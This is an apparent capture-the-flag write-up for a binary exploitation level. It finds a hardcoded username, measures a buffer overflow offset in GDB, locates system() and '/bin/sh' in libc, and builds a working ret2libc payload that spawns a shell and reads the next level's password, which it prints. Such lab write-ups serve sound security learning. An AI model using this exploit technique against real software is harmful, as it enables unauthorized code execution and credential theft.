level01

----- CAT -----

verifying username...
dat_wiladmin
********* ADMIN LOGIN PROMPT *********
Enter Username: nope, incorrect username...
Enter Password: nope, incorrect password...

with strings we check this swell

----- EXEC -----

1) 

********* ADMIN LOGIN PROMPT *********
Enter Username:
verifying username....

nope, incorrect username...

2) 

********* ADMIN LOGIN PROMPT *********
Enter Username: dat_wiladmin
verifying username....

Enter Password:

nope, incorrect password...

----- GDB -----
i functions (main, verify_user_name, verify_user_pass)

1) main call both functions.

2) verify_user_name:

0x0804847d <+25>:    mov    $0x80486a8,%eax = "dat_wil" 
we can see like before with cat "dat_wiladmin"

3) verify_user_pass:
0x080484ad <+10>:    mov    eax,0x80486b0  = "admin"

4) the user is working but the password is incorrect,
when i try to overflow the password we get: 

Program received signal SIGSEGV, Segmentation fault.
0x37634136 in ?? ()

let's try and check the offset:
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
offset: 80

----------------

b main
i proc map: we go to search for a lib string memory
0xf7e2c000 0xf7fcc000   0x1a0000        0x0 /lib32/libc-2.15.so

in this address we can find /bin/sh

find 0xf7e2c000, +9999999, "/bin/sh"
0xf7f897ec
warning: Unable to access target memory at 0xf7fd3b74, halting search.
1 pattern found.

x/s 0xf7f897ec
0xf7f897ec:      "/bin/sh" we got it ! 

if this tecnique doesnt work u can try this one

strings -a -t x /lib32/libc-2.15.so | grep "/bin/sh"
15d7ec /bin/sh

------

p system
$1 = {<text variable, no debug info>} 0xf7e6aed0 <system>

0xf7f897ec "/bin/sh" ===    \xec\x97\xf8\xf7
0xf7e6aed0 <system> ===     \xd0\xae\xe6\xf7

finally we need to ret an address
disas main
0x080485b5 <+229>:   ret    === \xb5\x85\x04\x08

(python -c 'print "dat_wil"'; python -c 'print "A" * 80 + "\xd0\xae\xe6\xf7" + "\xb5\x85\x04\x08" + "\xec\x97\xf8\xf7"';) > /tmp/level01
AAAA + sys + ret + bin
----- FLAG -----

whoami
    level01
cat /home/users/level02/.pass
    PwBLgNa8p8MTKW57S7zxVAQCxnCpV8JqTTs9XEBv

    
Ret2libc https://www.youtube.com/watch?v=m17mV24TgwY